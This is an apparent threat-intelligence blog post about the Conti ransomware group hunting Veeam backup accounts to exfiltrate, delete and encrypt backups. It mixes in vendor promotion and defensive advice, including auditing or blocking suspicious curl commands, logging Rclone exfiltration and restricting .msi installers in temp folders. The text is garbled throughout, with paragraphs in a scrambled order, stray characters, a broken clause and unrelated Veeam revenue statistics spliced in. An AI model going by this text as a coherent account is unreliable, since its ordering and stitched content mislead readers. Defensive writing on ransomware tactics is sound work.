The Conti ransomware group has made headlines around the world causing a great deal of damage during their relatively short tenure. Ransomware gangs know that having secure backups of critical files massively reduces the likelihood of a ransom payment being made, so it comes as no surprise that the rising star of the cybercrime world is targeting Veeam, the fastest growing and widespread backup platform for virtualized infrastructures In 2020 Veeam became the #2 provider worldwide in terms of overall revenue with YoY growth more than 17.5 percentage points above the market average 2. Likewise, Veeam had the fastest revenue growth in the worldwide Data Replication & Protection market, both sequentially (+21.5%) and YoY (+17.9%) in 2H’20 among the top 5 vendors, all other vendors combined, and overall market average, according to the IDC Semi-annual Software Tracker, 2H20. A recent report from ransomware incident response firm Coveware 1, based on thousands of cases investigated during Q2 2021, showed Conti V2 to be the second-most-prevalent ransomware encountered, trailing Sodinokibi, also known as REvil by just 2.1% for the top position. Sign up for AdvIntel services and get the most actionable intel on impending ransomware attacks, adversarial preparations for data stealing, and ongoing network investigation operations by the most elite cybercrime collectives.Conti ransomware first appeared in late 2019 and has steadily grown to become one of the forefront ransomware-as-a-service (RaaS) operations. Enabled backups tremendously decrease Conti’s ransom demands and can likely lead to data recovery with zero payments to the Conti collective.ĭisrupt ransomware attacks & prevent data stealing with AdvIntel’s threat disruption solutions.
Special security protocol, password update, and account security measures for Veeam should be implemented to prevent Veeam account takeover. Rclone and other data exfiltration command-line interface activities can be captured through proper logging of process execution with command-line arguments.
To prevent lateral movement, network hierarchy protocols and should be implemented with network segregation and decentralization.Īudit and/or block command-line interpreters by using whitelisting tools, like AppLocker or Software Restriction Policies with the focus on any suspicious “curl” command and unauthorized “.msi” installer scripts particularly those from C:\ProgramData and C:\Temp directory Tracking externally exposed endpoints is therefore critical. Sometimes Conti uses corporate VPN compromise and TrickBot delivery as an alternative means for attack initiation. Conti uses very developed social engineering techniques in order to convince the victim employees that the targeted emails are legitimated. To prevent the attack initiations, employee training, and email security protocols should be implemented. Secure backup solutions and mitigations listed will enable any possible victims to leave Conti without their demanded ransom money. Maintaining developed protocols of access rights hierarchy, network security, and password hygiene, as well as systemic network monitoring aimed at spotting abnormal network behavior may significantly reduce the chances of Conti successfully removing backups.
This way, Conti simultaneously exfiltrated the data for further victim blackmailing, while leaving the victim with no chances to quickly recover their files as the backups are removed. Conti hunts for Veeam privileged users and services and leverages to access, exfiltrate, remove and encrypt backups to ensure ransomware breaches are un-”backupable”. Conti group is particularly methodical in developing and implementing backup removal techniques.Ĭonti’s tactics are based on utilizing the skills of their network intruders or “pentesters” in order to ensure to target on-premise and cloud backup solutions. Backups are a major obstacle for any ransomware operation as they allow the victim to resume business by performing data recovery instead of paying ransom to the criminals.Ĭyber groups specifically target backup solutions in order to ensure that the victim has no other option except for paying the ransom.